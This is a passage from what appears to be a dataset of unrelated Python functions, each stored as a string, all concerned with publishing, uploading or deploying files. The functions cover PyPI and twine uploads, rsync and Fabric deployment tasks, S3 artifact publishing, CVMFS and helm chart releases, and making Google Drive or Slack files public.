buffer\n payload = http_object.read()\n http_object.close()\n # debug(payload)\n # Report outcome\n if (http_result != 200):\n if verbose:\n debug(\"Unsuccessful publish request returned HTTP code %d\" %\n http_result) \n nilog(\"%s,PUBLISH rx error bad response status,%d\" % (msgid,http_result));\n return\n # Check content type of returned message matches requested response type\n ct = http_object.headers[\"content-type\"]\n if ct != \"application/json\":\n if verbose:\n debug(\"Error: Expecting JSON coded (application/json) \"\n \"response but received Content-Type: %s\" % ct)\n nilog(\"%s,PUBLISH rx error bad content type,%s\" % (msgid,ct));\n return\n # If output of response is expected, print in the requested format\n if verbose:\n nilog( \"Publication of %s successful:\" % target)\n\n # JSON cases\n try:\n json_report = json.loads(payload)\n except Exception, e:\n if verbose:\n nilog(\"Error: Could not decode JSON report '%s': %s\" % (payload,\n str(e)))\n nilog(\"%s, PUBLISH rx error bad json decode\" % msgid);\n return\n\n if verbose: \n print json.dumps(json_report, indent = 4)\n etime=time.time()\n duration=etime-stime\n niuri=json_report[\"ni\"]\n nilog(\"%s,PUBLISH rx fine,ni,%s,size,%d,time,%10.10f\" % (msgid,niuri,fsize,duration*1000))\n\n return niuri", "def cvmfsPublish(reponame = None):\n if reponame == None:\n reponame = _getRepoName()\n\n rc = subprocess.call([\"cvmfs_server\", \"publish\", \"-f\", reponame])\n if rc != 0:\n raise RuntimeError(\"Could not publish CVMFS transaction\")", "def assets_push(ctx, metadata, dir, brizo, price, service_endpoint, timeout):\n try:\n files = [f for f in os.listdir(dir) if os.path.isfile(dir+'/'+f)]\n except NotADirectoryError:\n files = [dir]\n\n response = []\n metadata = json.load(open(metadata, 'r'))\n\n for f in files:\n metadata['base']['files'][0]['url'] = f\n response += [ctx.invoke(assets_publish,\n metadata=metadata,\n brizo=brizo,\n price=price,\n service_endpoint=service_endpoint,\n timeout=timeout)]", "def publish(self, service, pid=None):\n\n self.db_connect()\n\n # Find all files without a DOI (and assume these are in the publication staging area).\n with self.connection:\n query = \"SELECT * FROM %s WHERE doi IS NULL\" % PUBLICATIONS_TABLE\n c = self.connection.cursor()\n c.execute(query)\n to_publish = c.fetchall()\n\n if not to_publish:\n _LOG.warning(\"No files selected for publication.\")\n return\n\n # Does the user needs to commit any modified files first?\n modified_files = subprocess.check_output(['git', 'diff', '--name-only']).split()\n for i in range(len(modified_files)):\n # Get the absolute path\n modified_files[i] = self.repo.working_dir + \"/\" + modified_files[i]\n _LOG.debug(\"Modified files: %s\" % str(modified_files))\n \n # We only care if the uncommitted changes apply to files in the 'publishing staging area'.\n overlap = False\n for f in to_publish:\n if f[\"path\"] in modified_files:\n overlap = True\n if self.repo.is_dirty() and overlap:\n _LOG.error(\"Uncomitted changes exist in the repository. Please commit these changes before trying to publish any files.\")\n return\n \n # Get the minimal amount of metadata needed to publish from the user.\n response = raw_input(\"Private publication? (y/n): \")\n if response == \"y\" or response == \"Y\":\n _LOG.info(\"Publishing as a private repository...\")\n private = True\n elif response == \"n\" or response == \"N\":\n _LOG.info(\"Publishing as a public repository...\")\n private = False\n else:\n _LOG.error(\"Unknown response '%s'. Not publishing.\" % response)\n return\n\n parameters = self.get_publication_parameters()\n \n # Publish to the repository hosting service.\n publisher = Publisher(service=service)\n pid, doi = publisher.publish_data(parameters, pid=pid, private=private)\n \n # Update the publications database by adding the DOIs and publication IDs to the previously-staged files.\n with self.connection:\n c = self.connection.cursor()\n query = \"UPDATE %s SET doi=? WHERE doi IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [doi])\n query = \"UPDATE %s SET pid=? WHERE pid IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [pid])\n query = \"UPDATE %s SET date=? WHERE date IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [str(datetime.datetime.now().date())])\n query = \"UPDATE %s SET time=? WHERE time IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [str(datetime.datetime.now().time())])\n query = \"UPDATE %s SET sha=? WHERE sha IS NULL\" % (PUBLICATIONS_TABLE)\n c.execute(query, [str(self.repo.head.object.hexsha)])\n \n self.db_disconnect()\n \n return", "def download(urls, dest_folder):\n pass", "def publish(self):\n return", "def detect(self, filename):\n self.publish(filename)", "def publish(self):\n # Write the models locally\n local_path_dist = self.dump_distributions()\n local_path_model = self.dump_model()\n\n # Write them to cloud storage\n bucket_path_dist = self.get_bucket_path(self.filename_distributions)\n bucket_path_model = self.get_bucket_path(self.filename_model)\n\n config = self.services.config\n lake = self.services.lake\n\n\n lake.upload(bucket_path_dist, local_path_dist, bucket_name=config.lake_bucket)\n lake.upload(bucket_path_model, local_path_model, bucket_name=config.lake_bucket)\n\n # Now finally we want to write our reference file to our repository and build a merge request\n reference = {\n \"model\": {\n \"bucket\": config.lake_bucket,\n \"path\": bucket_path_model,\n \"md5\": file_md5(local_path_model),\n },\n \"distributions\": {\n \"bucket\": config.lake_bucket,\n \"path\": bucket_path_dist,\n \"md5\": file_md5(local_path_dist),\n },\n }\n\n return reference", "def publish(self):\n #vprint(\"PUBLISHING \",self.__dict__)\n \n js = self.compute_json()\n name = self.name\n #topicdir = \"/topicd/\" if constants.publishToS3Dev else \"/topic/\"\n s3path = constants.compositeDir+\"/\"+name+\"/main.json\" #the path where the page will finally end up\n s3.s3SetContents(s3path,contents=js,relativeTo=\"\",contentType=\"application/json\")\n self.genPage()", "def upload_release_files():\n version = get_release_version()\n target = sf_files + sourceforge_target_dir(version)\n\n print()\n print(\"Uploading release files...\")\n print(\" Source:\", release_path)\n print(\" Target: \" + target)\n print(\" Files: \" + ', '.join(glob.glob('*')))\n print()\n call_rsync(\n username,\n \"\",\n path.join(release_path, \"*\"),\n target\n )\n print()", "def publish(self, settings, item):\n\n publisher = self.parent\n engine = publisher.engine\n document = item.properties[\"document\"]\n\n path = _document_path(document)\n item.properties[\"upload_path\"] = path\n item\n psdProject = PSDImage.open(path)\n\n #save layers to link and create new task to do so\n for layer in psdProject:\n layer.compose().save(layer.name+'.tiff')\n self.logger.info(\"Saved Layer {layerName}.psd\".format(layerName=layer.name))\n publish = sgtk.util.register_publish(publisher.sgtk,\n item.context,\n os.path.join(os.path.dirname(path),layer.name+'.tiff'),\n layer.name,\n version_number=None,\n published_file_type=\"Rendered Image\")", "def publish(self, id: uplink.Path):\n pass", "def publishUploads(self, manualVerify = True):\n for key in self.nbDetails:\n # Skip metadata key if present\n if key!='proc' and self.nbDetails[key]['pkg'] and self.nbDetails[key]['archFilesOK']:\n self.publishRepoItem(key, manualVerify = manualVerify)", "def pub_upload(args, project=\"\", base_url=\"\", api_key=\"\"):\n project, base_url, api_key, updated = get_project_config(\n project=project, base_url=base_url, api_key=api_key)\n if updated:\n save_config()\n upload_theme(args, base_url, api_key, prefix=project)", "def publish(self, message: str) -> None:\n if __debug__:\n logger.warning(\n \"WARN: Unnecessary call on publish on FileDistroStream\"\n )", "def _TransferPublishManifest(self, publish_manifest, db_path_prefix,\n force_copy):\n for item in publish_manifest:\n src_path = item.current_path\n dest_path = \"%s/%s\" % (db_path_prefix, item.orig_path)\n logger.debug(\"TransferPublishManifest - src_path: %s, dest_path: %s.\",\n src_path, dest_path)\n\n # Transfer manifest file to published database directory.\n tries = 2\n sleep_secs = 5\n while (not serve_utils.LocalTransfer(\n src_path, dest_path,\n force_copy, prefer_copy=True, allow_symlinks=False)):\n tries -= 1\n if tries == 0:\n raise exceptions.PublishServeException(\n \"Could not transfer publish manifest file %s to %s.\" %\n (src_path, dest_path))\n logger.debug(\"Retrying Local Transfer.\")\n time.sleep(sleep_secs)\n sleep_secs *= 2 # Double the sleep time after each retry.", "def save_publish():\n import mop\n\n path = cmds.file(query=True, location=True)\n work_dir = os.path.dirname(path)\n publish_dir = os.path.join(work_dir, \"release\")\n\n highest_publish = None\n highest_version = -1\n\n for f in os.listdir(publish_dir):\n ext = os.path.splitext(f)[-1]\n if ext == \".ma\":\n pattern = r\"v(?P<version>\\d{3})\"\n regex = re.compile(pattern)\n match = regex.search(f)\n if match:\n version = int(match.group(\"version\"))\n if version > highest_version:\n highest_version = version\n highest_publish = f\n\n new_path = mop.increment_version(os.path.join(publish_dir, highest_publish))\n cmds.file(rename=new_path)\n cmds.file(save=True, force=True)", "def send_to(self, dest='.', src='/tmp/', url='localhost',\n rsync='rsync -auv'):\n files = self.setup(dest=dest, src=src)\n self.send_files(files, url=url, rsync=rsync)", "def upload():\n env.user = 'webcontent'\n rsync_project(DOCDIR, 'doc/_build/html/', delete=True)", "def __publish_dirt(self, dirt):\n self.dirt_pub.publish(dirt)", "def publish(self, file_name, c_id, size, torrent, files): # ver lo del id del cliente\n dht = get_remote_node(self.dht_ip, self.dht_port)\n v = dht.get(get_hash(file_name))\n\n if v == None:\n dht.set(get_hash(file_name), [c_id])\n cantstep = dht.get(get_hash(maxstep))\n print(\"cantstep\", cantstep)\n l = len(dht.get(get_hash(filestep + \"|\" + str(cantstep))))\n if l == lenstep: #create new step\n print(\"full step\")\n dht.set(get_hash(maxstep), cantstep + 1)\n dht.set(get_hash(filestep + \"|\" + str(cantstep + 1)), [file_name])\n else:\n all = dht.get(get_hash(filestep + \"|\" + str(cantstep)))\n all.append(file_name)\n dht.set(get_hash(filestep + \"|\" + str(cantstep)), all)\n k = sizefile + \"|\" + file_name\n dht.set(get_hash(k), size)\n dht.set(get_hash(file_name + \".torrent\"), torrent) #first time to publish this .torrent\n else:\n if not v.__contains__(c_id):\n v.append(c_id)\n dht.set(get_hash(file_name), v)\n\n dht.set(get_hash(myfiles + \"|\" + str(c_id)),files)\n print(\"client \", c_id, \"published file \", file_name)", "def deploy():\n build()\n collect()\n commit()\n push()", "def publish(self, path, document, content_type='text/plain'):\n path = ensure_slash(path)\n self.send_request('__pub', document, {\n 'path': path,\n 'type': content_type\n })\n return self.uri(path)", "def upload(ctx, release, rebuild, version):\n\n dist_path = Path(DIST_PATH)\n if rebuild is False:\n if not dist_path.exists() or not list(dist_path.glob('*')):\n print(\"No distribution files found. Please run 'build' command first\")\n return\n else:\n ctx.invoke(build, force=True, version=version)\n\n if release:\n args = ['twine', 'upload', 'dist/*']\n else:\n repository = 'https://test.pypi.org/legacy/'\n args = ['twine', 'upload', '--repository-url', repository, 'dist/*']\n\n env = os.environ.copy()\n\n p = subprocess.Popen(args, env=env)\n p.wait()", "def deploy():\n build()\n copy()\n install()", "def publish_list(self, messages: list) -> None:\n if __debug__:\n logger.warning(\n \"WARN: Unnecessary call on publish on FileDistroStream\"\n )", "def fast_publish(self, request):\n self.__connection.fast_publish(request)", "def upload():\n sh('python setup.py register sdist upload')", "def download_files(self):", "def perform_upload(path):\n subprocess.call(\n ['twine', 'upload', path + '/dist/*'])", "def publish(\n self,\n db: PysonDB,\n *,\n production: bool, # PyPI or Test-PyPi\n build=False, #\n force=False, # publish even if no changes\n dry_run=False, # do not actually publish\n clean: bool = False, # clean up afterwards\n ) -> (\n bool\n ): # sourcery skip: assign-if-exp, default-mutable-arg, extract-method, remove-unnecessary-else, require-parameter-annotation, swap-if-else-branches, swap-if-expression\n log.info(f\"Publish: {self.package_path.name}\")\n # count .pyi files in the package\n filecount = len(list(self.package_path.rglob(\"*.pyi\")))\n if filecount == 0:\n log.debug(f\"{self.package_name}: starting build as no .pyi files found\")\n build = True\n\n if build or force or self.is_changed():\n self.build(production=production, force=force)\n\n if not self._publish:\n log.debug(f\"{self.package_name}: skip publishing\")\n return False\n\n self.update_pkg_version(production=production)\n # Publish the package to PyPi, Test-PyPi or Github\n if self.is_changed() or force:\n if self.mpy_version == \"latest\":\n log.warning(\"version: `latest` package will only be available on Github, and not published to PyPi.\")\n self.status[\"result\"] = \"Published to GitHub\"\n else:\n self.update_hashes() # resets is_changed to False\n if not dry_run:\n pub_ok = self.poetry_publish(production=production)\n else:\n log.warning(f\"{self.package_name}: Dry run, not publishing to {'' if production else 'Test-'}PyPi\")\n pub_ok = True\n if not pub_ok:\n log.warning(f\"{self.package_name}: Publish failed for {self.pkg_version}\")\n self.status[\"error\"] = \"Publish failed\"\n return False\n self.status[\"result\"] = \"Published to PyPi\" if production else \"Published to Test-PyPi\"\n self.update_hashes()\n if dry_run:\n log.warning(f\"{self.package_name}: Dry run, not saving to database\")\n else:\n # get the package state and add it to the database\n db.add(self.to_dict())\n db.commit()\n return True\n else:\n log.info(f\"No changes to package : {self.package_name} {self.pkg_version}\")\n\n if clean:\n self.clean()\n return True", "def pub_download(args, project=\"\", base_url=\"\", api_key=\"\"):\n project, base_url, api_key, updated = get_project_config(\n project=project, base_url=base_url, api_key=api_key)\n if updated:\n save_config()\n download_theme(args, base_url, api_key, prefix=project)", "def publish(request):\n context = RequestContext(request)\n page = Page.objects.get(website=request.website, url=request.POST['page_route'])\n try:\n page.publish(context)\n page.clear_cache(context)\n purge_varnish(request)\n except Exception, e:\n # log error\n raise e\n return HttpResponse('error')\n messages.success(request, 'Your changes have been published successfully.')\n return HttpResponse('true')", "def copy():\n put(os.path.join('dist', get_egg_name()), remote_egg_dir)", "def cmd_gallery_publish(client, args):\n publish_to_imgur = client.share_on_imgur(args.item_id, args.title, args.terms)\n generate_output({'publish_to_imgur': publish_to_imgur})", "def upload_files(self, files):\n\n for f in files:\n self.scp.put(f, recursive=True)", "def deploy():", "def convert_to_web(base_path, files):\n for i, f in enumerate(files):\n imagetype = get_imagetype_from_filename(f)\n cmd = ('rsync '\n '{base_path}/qc/phantom/{imagetype}/{f} '\n '{base_path}/website/assets/{output}'.format(\n base_path=base_path, imagetype=imagetype, \n f=f, output=f[9:]))\n os.system(cmd)", "def deploy_nucleondocs():\n\n # Copy generated docs to docs_webserver on target machine\n rsync_project(\n remote_dir= '/srv/docs_webserver/docs/nucleon/',\n local_dir=join(dirname(__file__), 'docs/_build/html/'),\n delete=True)", "def send_files(self, files, url='localhost', rsync='rsync -auv'):\n self.url = url\n self.no_ssh = url == 'localhost' # this may need changes for tunnels\n self.rsync = rsync\n if hasattr(self, 'files_have_been_sent') and self.files_have_been_sent:\n pass\n else:\n _sync_forward(files, self.rsync, self.no_ssh, self.url)\n self.files_sent(True)", "def upload_package(self, __contents):\n raise NotImplementedError", "def sync_submission_files(self):\n blobs = GoogleStorage().list_blobs_with_prefix(self.bucket_name, 'submissions')\n\n for blob in blobs:\n destination_file_name = os.path.join(os.environ['PROJ_HOME'], blob.name)\n\n # Check if the local file exist before download file\n if not os.path.isfile(destination_file_name):\n blob.download_to_filename(destination_file_name)\n print('Downloaded file {destination_file_name}'.format(destination_file_name=destination_file_name))", "def publish(self, path, recipient, *args):\n if not os.environ.get(\"OS_PROJECT_ID\", None):\n logging.log(\n logging.ERROR,\n \"Openstack RC file hasn't been sourced in the working %s%s\",\n \"environment. Please source an Openstack RC file to enable\",\n \" the use of Openstack tools.\",\n )\n sys.exit(-1)\n\n container = \"shared-upload-\" + recipient + \"-\" + time.strftime(\"%Y%m%d-%H%M%S\")\n\n subprocess.call([\"swift\", \"upload\", container, path]) # nosec\n\n self.share(container, recipient, *args)", "def publish(config_filepath):\n logging.info('Projects: Listing and publishing projects')\n config = config_utils.config(config_filepath)\n batch_id = common_utils.get_unique_id()\n timestamp = common_utils.zulu_timestamp()\n published_projects = set()\n\n resources = config.value('export.resources', default=tuple())\n for resource in resources:\n projects = _get_resource_projects(resource)\n for project in projects:\n project.timestamp = timestamp\n _publish_project_details(project, config, batch_id,\n published_projects)", "def website_publish_button(self):\n if self.website_published:\n self.write({'website_published': False})\n else:\n self.write({'website_published': True})", "def publish_artifacts(self): # pylint: disable=too-many-locals\n try:\n b3resource = boto3.resource(\n 's3', endpoint_url=os.environ[\"S3_ENDPOINT_URL\"])\n dst_s3_url = os.environ[\"S3_DST_URL\"]\n multipart_threshold = 5 * 1024 ** 5 if \"google\" in os.environ[\n \"S3_ENDPOINT_URL\"] else 8 * 1024 * 1024\n config = TransferConfig(multipart_threshold=multipart_threshold)\n bucket_name = urlparse(dst_s3_url).netloc\n try:\n b3resource.meta.client.head_bucket(Bucket=bucket_name)\n except botocore.exceptions.ClientError as exc:\n error_code = exc.response['Error']['Code']\n if error_code == '404':\n # pylint: disable=no-member\n b3resource.create_bucket(Bucket=bucket_name)\n else:\n raise exc\n except Exception as exc: # pylint: disable=broad-except\n raise exc\n path = urlparse(dst_s3_url).path.strip(\"/\")\n dst_http_url = os.environ[\"HTTP_DST_URL\"]\n output_str = \"\\n\"\n # protects if test cases return details as None\n self.details = self.details or {}\n self.details[\"links\"] = []\n for log_file in [self.output_log_name, self.output_debug_log_name]:\n if os.path.exists(os.path.join(self.dir_results, log_file)):\n abs_file = os.path.join(self.dir_results, log_file)\n mime_type = mimetypes.guess_type(abs_file)\n self.__logger.debug(\n \"Publishing %s %s\", abs_file, mime_type)\n # pylint: disable=no-member\n b3resource.Bucket(bucket_name).upload_file(\n abs_file, os.path.join(path, log_file), Config=config,\n ExtraArgs={'ContentType': mime_type[\n 0] or 'application/octet-stream'})\n link = os.path.join(dst_http_url, log_file)\n output_str += f\"\\n{link}\"\n self.details[\"links\"].append(link)\n for root, _, files in os.walk(self.res_dir):\n for pub_file in files:\n abs_file = os.path.join(root, pub_file)\n mime_type = mimetypes.guess_type(abs_file)\n self.__logger.debug(\n \"Publishing %s %s\", abs_file, mime_type)\n # pylint: disable=no-member\n b3resource.Bucket(bucket_name).upload_file(\n abs_file,\n os.path.join(path, os.path.relpath(\n os.path.join(root, pub_file),\n start=self.dir_results)),\n Config=config,\n ExtraArgs={'ContentType': mime_type[\n 0] or 'application/octet-stream'})\n link = os.path.join(dst_http_url, os.path.relpath(\n os.path.join(root, pub_file),\n start=self.dir_results))\n output_str += f\"\\n{link}\"\n self.details[\"links\"].append(link)\n self.__logger.info(\n \"All artifacts were successfully published: %s\\n\", output_str)\n return TestCase.EX_OK\n except KeyError as ex:\n self.__logger.error(\"Please check env var: %s\", str(ex))\n return TestCase.EX_PUBLISH_ARTIFACTS_ERROR\n except botocore.exceptions.NoCredentialsError:\n self.__logger.error(\n \"Please fill ~/.aws/credentials, ~/.boto or set \"\n \"AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY in env\")\n return TestCase.EX_PUBLISH_ARTIFACTS_ERROR\n except Exception: # pylint: disable=broad-except\n self.__logger.exception(\"Cannot publish the artifacts\")\n return TestCase.EX_PUBLISH_ARTIFACTS_ERROR", "def compute_published_path_to_file(self, file_to_publish: str) -> str:\n\n return os.path.join(\n self.publish_dir,\n os.path.basename(file_to_publish),\n )", "def upload():\n run('mkdir -p /srv/images/'+env.project_name+'/')\n rsync_project(\n env.project_dir, './',\n exclude=(\n '.git', '.gitignore', '__pycache__', '*.pyc', '.DS_Store', 'environment.yml',\n 'fabfile.py', 'Makefile', '.idea', 'bower_components', 'node_modules',\n '.env.example', 'README.md', 'var'\n ), delete=True)", "def make_public(self, recursive=False):\n log.warning('Cannot make %s public.', self.file_name)", "def release_pypi():\n local('python setup.py clean sdist register upload')", "def deploy():\n setup()\n builddir = get_build_dir()\n if sys.platform == 'win32':\n # Support cygwin rsync on windows:\n build_path = cygpath(slashed(builddir))\n else:\n build_path = slashed(builddir)\n rsync_project(env.admin_webroot, build_path, exclude=\".*\", delete=True)\n sudo(\"chmod -R 755 %(admin_webroot)s\" % env)", "def publish(self, message: str) -> None:", "def publish_pages(name, paths, git_repo, published_repo, extra_message=''):\n version = last_modified_commit(*paths)\n checkout_dir = '{}-{}'.format(name, version)\n check_call([\n 'git', 'clone', '--no-checkout',\n git_remote(git_repo), checkout_dir],\n echo=False,\n )\n check_call(['git', 'checkout', 'gh-pages'], cwd=checkout_dir)\n\n # package the latest version into a temporary directory\n # and run helm repo index with --merge to update index.yaml\n # without refreshing all of the timestamps\n with TemporaryDirectory() as td:\n check_call([\n 'helm', 'package', name,\n '--destination', td + '/',\n ])\n\n check_call([\n 'helm', 'repo', 'index', td,\n '--url', published_repo,\n '--merge', os.path.join(checkout_dir, 'index.yaml'),\n ])\n\n # equivalent to `cp td/* checkout/`\n # copies new helm chart and updated index.yaml\n for f in os.listdir(td):\n shutil.copy2(\n os.path.join(td, f),\n os.path.join(checkout_dir, f)\n )\n check_call(['git', 'add', '.'], cwd=checkout_dir)\n if extra_message:\n extra_message = '\\n\\n%s' % extra_message\n else:\n extra_message = ''\n check_call([\n 'git',\n 'commit',\n '-m', '[{}] Automatic update for commit {}{}'.format(name, version, extra_message)\n ], cwd=checkout_dir)\n check_call(\n ['git', 'push', 'origin', 'gh-pages'],\n cwd=checkout_dir,\n )", "def deploy(path=DEFAULT_PATH):\n files = [\n \"geo.db\",\n \"geo.php\",\n \"Spyc.php\"\n ]\n\n for file in files:\n put(file, path)\n sudo(\"chown %s:%s %s\" % (WWW_USER, WWW_USER, os.path.join(path, file)))\n\n rewrite_rules(path=path)", "def assets_publish(ctx, metadata, brizo, price, service_endpoint, timeout):\n from .api.assets import create\n response = create(metadata,\n secret_store=not brizo,\n price=price,\n service_endpoint=service_endpoint,\n timeout=timeout,\n ocean=ctx.obj['ocean'])\n echo(response)", "def get_public_url(self,project,filename):\n pass", "def publish_package_on_reposerver(sourcepath):\n ssh = utils.connect_ssh(\n dst=f'{CONDA_REPO_SETTINGS[\"user\"]}@{CONDA_REPO_SETTINGS[\"host\"]}')\n ftp_client = ssh.open_sftp()\n ftp_client.put(sourcepath,\n f'{CONDA_REPO_SETTINGS[\"packages_path\"]}/'\n f'{Path(sourcepath).name}')\n ftp_client.close()\n index_cmd = (f'{CONDA_REPO_SETTINGS[\"conda_exe\"]} index '\n f'{CONDA_REPO_SETTINGS[\"packages_path\"]}')\n _, _, index_err = ssh.exec_command(index_cmd)\n index_err.channel.recv_exit_status()", "def push_backup(args: Arguments) -> None:\n\n files = get_files_from_previous_backup(args.site)\n bucket = get_bucket(args)\n\n for path in files:\n upload_file(\n path=path,\n site_name=args.site,\n bucket=bucket,\n bucket_directory=args.bucket_directory,\n )\n\n print(\"Done!\")", "def deploy():\n require('hosts', provided_by=[prod])\n require('whole_path', provided_by=[prod])\n require('code_root')\n upload_tar_from_git(env.whole_path)\n install_requirements()\n symlink_current_release()\n migrate()\n restart_webservers()\n setup_permissions()\n collectstatic()", "def deploy():\n upload_static()\n compile_code()\n upload_code()\n upload_supervisor()\n start_server()", "def upload(outfile, outdir):\n outpath = outdir + \"/\" + outfile\n my_env = os.environ.copy()\n my_env[\"X509_USER_PROXY\"] = dst_cred\n for retry in range(0,99):\n try:\n subprocess.check_output([\"globus-url-copy\", \"-create-dest\",\n \"-rst\", \"-stall-timeout\", \"300\",\n \"-ds\", dst_dn, \"-dst-cred\", dst_cred,\n \"file://\" + os.getcwd() + \"/\" + outfile,\n dst_url + outpath], env=my_env)\n return 0\n except:\n continue\n subprocess.check_output([\"globus-url-copy\", \"-create-dest\",\n \"-rst\", \"-stall-timeout\", \"300\",\n \"-ds\", dst_dn, \"-dst-cred\", dst_cred,\n \"file://\" + os.getcwd() + \"/\" + outfile,\n dst_url + outpath], env=my_env)\n return 0", "def deploy():\n myfile = do_pack()\n if myfile is None:\n return False\n return do_deploy(myfile)", "def _publish(client, manifest_path, marketplace, skip, overrides):\n try:\n manifest_json = check_app_manifest(manifest_path, overrides, marketplace)\n app_url = \"{}://{}\".format(manifest_json[\"schemes\"][0], manifest_json[\"host\"])\n app_ip = urlparse(app_url).hostname\n\n if not skip:\n address = get_zerotier_address(marketplace)\n\n if address != app_ip:\n wrong_ip = click.style(\"It seems that the IP address that you put in your manifest file (\") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\") is different than your current 21market IP (\") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\")\\nAre you sure you want to continue publishing with \") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\"?\")\n if not click.confirm(wrong_ip.format(app_ip, address, app_ip)):\n switch_host = click.style(\"Please edit \") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\" and replace \") +\\\n click.style(\"{}\", bold=True) +\\\n click.style(\" with \") +\\\n click.style(\"[{}].\", bold=True)\n logger.info(switch_host.format(manifest_path, app_ip, address))\n return\n\n except exceptions.ValidationError as ex:\n # catches and re-raises the same exception to enhance the error message\n publish_docs_url = click.style(\"https://21.co/learn/21-publish/\", bold=True)\n publish_instructions = \"For instructions on publishing your app, please refer to {}\".format(publish_docs_url)\n raise exceptions.ValidationError(\n \"The following error occurred while reading your manifest file at {}:\\n{}\\n\\n{}\"\n .format(manifest_path, ex.args[0], publish_instructions),\n json=ex.json)\n\n app_name = manifest_json[\"info\"][\"title\"]\n app_endpoint = \"{}://{}{}\".format(manifest_json[\"schemes\"][0],\n manifest_json[\"host\"],\n manifest_json[\"basePath\"])\n\n logger.info(\n (click.style(\"Publishing {} at \") + click.style(\"{}\", bold=True) + click.style(\" to {}.\"))\n .format(app_name, app_endpoint, marketplace))\n payload = {\"manifest\": manifest_json, \"marketplace\": marketplace}\n try:\n response = client.publish(payload)\n except ServerRequestError as e:\n if e.status_code == 403 and e.data.get(\"error\") == \"TO600\":\n logger.info(\n \"The endpoint {} specified in your manifest has already been registered in \"\n \"the marketplace by another user.\\nPlease check your manifest file and make \"\n \"sure your 'host' field is correct.\\nIf the problem persists please contact \"\n \"support@21.co.\".format(app_endpoint), fg=\"red\")\n return\n else:\n raise e\n\n if response.status_code == 201:\n response_data = response.json()\n mkt_url = response_data['mkt_url']\n permalink = response_data['permalink']\n logger.info(\n click.style(\n \"\\n\"\n \"You have successfully published {} to {}. \"\n \"You should be able to view the listing within a few minutes at {}\\n\\n\"\n \"Users will be able to purchase it, using 21 buy, at {} \",\n fg=\"magenta\")\n .format(app_name, marketplace, permalink, mkt_url)\n )", "def execute(\n name: str,\n *args: Any,\n **kwargs: Any\n ) -> None:\n cherrypy.engine.publish(name, *args, **kwargs) # type: ignore", "def install():\n execute(generate)\n execute(upload)", "def deploy():\n\n project_dir = '/home/gastosabertos/gastos_abertos_website'\n with cd(project_dir):\n local('tar -cvzf build.tar.gz build')\n run('cp -r build build-old')\n put('build.tar.gz', '.')\n run('tar -xvf build.tar.gz')", "def deploy():\n require(\"hosts\", provided_by=[production, staging])\n env.release = time.strftime(\"%Y-%m-%d_%H:%M:%S\")\n upload_tar_from_git()\n install_requirements()\n setup_webserver()\n symlink_current_release()\n restart_webserver()", "def deploy():\n with cd(\"~/public_html/\"):\n run(\"/usr/local/cpanel/3rdparty/bin/git pull\")\n\n with cd(\"~/public_html/skin/frontend/gemz/default/tools/\"):\n run(\"grunt default\")\n #sudo(\"/scripts/enablefileprotect\")", "def upload():\n if not os.path.exists(\"./.notes\"):\n print(\"Notes repo not yet initialized!\")\n \n # Get google drive resource\n drive = get_drive()\n\n # Get parent folder from initialization\n with open(\".notes/PARENT\", \"r\") as parent_id_file:\n parent_id = parent_id_file.read()\n\n links_file = open(\"links.json\", \"w\")\n links = {}\n # For each pdf, upload it and get link!\n for filename in os.listdir(\"outputs\"):\n if re.match(\".*.pdf\", filename):\n metadata = {'name': filename,\n 'parents': [parent_id]}\n media = MediaFileUpload(\"outputs/\" + filename,\n mimetype=\"application/pdf\",\n resumable=True)\n file_id = drive.files().create(body=metadata,\n media_body=media,\n fields=\"id\").execute()\n drive.permissions().create(fileId=file_id['id'],\n body={\n 'type': 'anyone',\n 'role': 'reader',\n 'withLink': 'true'\n }, fields=\"id\").execute()\n link = drive.files().get(fileId=file_id['id'],\n fields=\"webViewLink\").execute()\n links[filename] = link[\"webViewLink\"]\n print(\"Uploaded\", filename)\n\n # Dump the links into json file.\n links_file.write(json.dumps(links))\n links_file.close()", "def make_file_public(self, slack_file_id: str) -> SlackResponse:\n try:\n response = self.client.files_sharedPublicURL(\n file=slack_file_id,\n token=self.user_token\n )\n return response\n except SlackApiError as e:\n logging.error(f\"Error uploading file: {e}\")", "def publish_updates():\n run_subprocess(['osg-batch-update'])", "def post_download(self, remote_files):\n pass", "def package(self, outfile, update=False, local=True, remote=True):\n log.debug(\"Packaging and streaming %s\" % self.name)\n with TarPackaging(outfile) as tar:\n self._build(tar, update, local, remote, True)\n log.debug(\"Packaged %s\" % self.name)", "def _test_upload_dir_contents(self, filenames):\n local_src_dir = self._local_tempdir\n remote_dest_dir = 'remote_dest_dir'\n for filename in filenames:\n self._expected_commands.append('%s cp -a public %s %s' % (\n GSUTIL_LOCATION,\n os.path.join(local_src_dir, filename),\n posixpath.join(remote_dest_dir, filename)))\n with open(os.path.join(local_src_dir, filename), 'w'):\n pass\n gs_utils.upload_dir_contents(\n local_src_dir=local_src_dir, remote_dest_dir=remote_dest_dir,\n gs_acl='public')", "def deploy():\n _git_pull()\n _migrate()\n _collect_static_files()\n _restart_webserver()", "def publish(self):\n xml_description = self._generate_flow_xml()\n\n file_elements = {'description': xml_description}\n return_code, return_value = _perform_api_call(\n \"flow/\", file_elements=file_elements)\n self.flow_id = int(xmltodict.parse(return_value)['oml:upload_flow']['oml:id'])\n return self", "def test_publish(self):\n\n adminuser,adminpass = self.testdata.find_account_for('toolmanager')\n\n self.utils.account.login_as(adminuser,adminpass)\n\n self.contribtool.publish(TOOLNAME)", "def test_stream_publish(self):\n pass", "def publishObject(self, obj):\n\n try:\n req = self.s.put(obj.selfUrl + '/publish')\n if req.status_code == requests.codes.ok:\n print('object {0} published'.format(obj.id))\n return self.getObject(obj.selfUrl)\n\n\n except requests.exceptions.RequestException as err:\n print('publish request failed:', err)", "def make_file_public(self, file_id):\n\n # Check if file is already public\n response = self.client.api_call(\n f'files.info?'\n f'file={file_id}'\n )\n if response['ok'] and response['file']['public_url_shared'] is True:\n return response\n\n response = self.client.api_call(\n f'files.sharedPublicURL?'\n f'file={file_id}'\n )\n assert response['ok']\n\n return response", "def upload_wheels():\n build()\n sh(\"%s -m twine upload dist/*.whl\" % PYTHON)", "def submitUploads(self, local = False):\n\n # Set and upload files to repo using 